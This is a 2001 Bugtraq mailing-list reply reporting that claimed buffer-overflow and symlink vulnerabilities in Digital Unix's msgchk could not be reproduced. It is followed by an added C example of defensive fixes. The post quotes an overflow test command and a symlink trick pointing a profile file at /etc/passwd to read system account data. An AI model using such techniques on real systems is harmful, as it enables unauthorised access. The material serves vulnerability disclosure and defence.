Bugtraq mailing list archives
FW: Digital Unix 4.0x msgchk multiple vulnerabilities
From: "Boyce, Nick" <nick.boyce () eds com>
Date: Wed, 12 Sep 2001 10:54:41 +0100
[Resend: my original reply to Bugtraq on Monday 10th has not appeared, and I haven't seen any other followup; this time I've replaced all weird > ASCII 127 characters in my screen dumps by X's in case that prevented my email's handling by some MTA somewhere]

On 10 September 2001 03:54, SeungHyun Seo said :
there were multiple vulnerabilities in "/usr/bin/mh/msgchk" on digital unix 4.0x. it's a mail utility - check for messages (only available within the message handling system, mh)
[...]
/usr/bin/mh/msgchk is affected by a buffer overflow vulnerability

-- snip --
$ /usr/bin/mh/msgchk `perl -e 'print "A"x9000'`
AAAAAAAAAAAAA ... ... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA : msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAA ... ... AAAAAAAAAAAAAAAAAAAAAAA
Memory fault(coredump)
-- snip --
NOT confirmed. On my system (Digital Unix 4.0D, Patch Kit 5) this gives me :

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... AAAAAAAAAAAAAA : msgchk: no such user as AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

followed by another command prompt.

And the exploit doesn't work :

/usr/users/joesoap/bin>cc msgbreak.c -o msgbreak -std
/usr/users/joesoap/bin>msgbreak
I'm going to create the standard MH path for you.
AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
....   [lots of pairs of "G" followed by "y" with an upsilon accent]
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
....   [even more A's]
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA XX : msgchk: no such user as AAAAAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
/usr/users/joesoap/bin>whoami
joesoap
/usr/users/joesoap/bin>uname -a
OSF1 mybox V4.0 878 alpha

(Lines wrapped for readability, and unprintable blobs replaced by X's.)

Looks like there must have been a patch for this somewhere in Patch Kits 1 thru 5. Or maybe the hole only exists *prior* to 4.0D.

Part 2:
Next, /usr/bin/mh/msgchk has a vulnerability that lets anyone read 1 line of the unprivileged file on the system. It's an old bug on Red Hat Linux 2.0, but it also works on Digital Unix 4.0x
This hole doesn't work either :

/usr/users/joesoap>ln -sf /etc/passwd ./~mh_profile
/usr/users/joesoap>/usr/bin/mh/msgchk
joesoap : No file-source mail waiting; last read on Wed, 27 Sep 2000 17:48:21 BST
/usr/users/joesoap>head -2 ./~mh_profile
root:xxxxxxxxxxxxx:0:1:system PRIVILEGED account:/:/bin/csh
nobody:*Nologin:65534:65534:anonymous NFS user:/:

Nick Boyce
EDS, Bristol, UK
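The two bug classes in this thread (a username argument copied into a fixed buffer without a length check, and a per-user profile file opened by a privileged program without regard to whether it is a symlink pointing at something else) have standard defensive fixes. The C below is an added example written for this page; it is not MH code, not from the original report, and nothing in it is specific to Digital Unix. The function names copy_username and open_profile_nofollow, the 32-byte limit, and the scratch directory under /tmp are all assumptions made up for the illustration; the 9000-byte argument mirrors the length used in the report.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define MAX_USERNAME 32   /* hypothetical limit for a username argument */

/* Copy a username argument into a fixed-size buffer.  Returns 0 on success,
   -1 when the argument would not fit (it is rejected, not silently truncated).
   strnlen never reads past dstlen bytes, so an oversized argument is cheap to
   refuse even when it is thousands of bytes long. */
int copy_username(const char *arg, char *dst, size_t dstlen) {
    size_t n = strnlen(arg, dstlen);
    if (n >= dstlen) return -1;
    memcpy(dst, arg, n + 1);          /* n + 1 copies the terminating NUL */
    return 0;
}

/* Open a user-controlled profile path for reading, refusing to follow a
   symlink in the final component (O_NOFOLLOW makes open() fail instead) and
   refusing anything that is not a regular file.  Returns an fd or -1. */
int open_profile_nofollow(const char *path) {
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed scenario: a regular file and a symlink to it in a scratch
   directory.  Returns 1 when the regular file opens and the symlink is
   rejected, 0 otherwise.  Cleans up after itself. */
int demo_symlink_check(void) {
    char dir[] = "/tmp/mhdemoXXXXXX";       /* template for mkdtemp */
    if (mkdtemp(dir) == NULL) return 0;
    char real[256], linkpath[256];
    snprintf(real, sizeof real, "%s/target", dir);
    snprintf(linkpath, sizeof linkpath, "%s/profile", dir);

    FILE *f = fopen(real, "w");
    if (f == NULL) { rmdir(dir); return 0; }
    fputs("constructed profile contents\n", f);
    fclose(f);
    if (symlink(real, linkpath) != 0) { unlink(real); rmdir(dir); return 0; }

    int fd_real = open_profile_nofollow(real);
    int fd_link = open_profile_nofollow(linkpath);
    int result = (fd_real >= 0) && (fd_link < 0);
    if (fd_real >= 0) close(fd_real);

    unlink(linkpath);
    unlink(real);
    rmdir(dir);
    return result;
}

/* Constructed input: a 9000-byte run of 'A', as in the report.  Returns the
   result of copy_username, which is -1 (rejected) for this input. */
int demo_long_argument(void) {
    char *arg = malloc(9001);
    if (arg == NULL) return -2;
    memset(arg, 'A', 9000);
    arg[9000] = '\0';
    char buf[MAX_USERNAME];
    int rc = copy_username(arg, buf, sizeof buf);
    free(arg);
    return rc;
}

int main(void) {
    char buf[MAX_USERNAME];
    printf("joesoap accepted: %s\n",
           copy_username("joesoap", buf, sizeof buf) == 0 ? "yes" : "no");
    printf("9000 x 'A' rejected: %s\n", demo_long_argument() == -1 ? "yes" : "no");
    printf("symlinked profile rejected, regular file accepted: %s\n",
           demo_symlink_check() ? "yes" : "no");
    return 0;
}
```

On Linux, open() with O_NOFOLLOW fails with ELOOP when the last path component is a symlink; the example only checks for failure, since other systems report a different errno. Rejecting rather than truncating the oversized argument is deliberate: a silently truncated username can turn into a different, valid username.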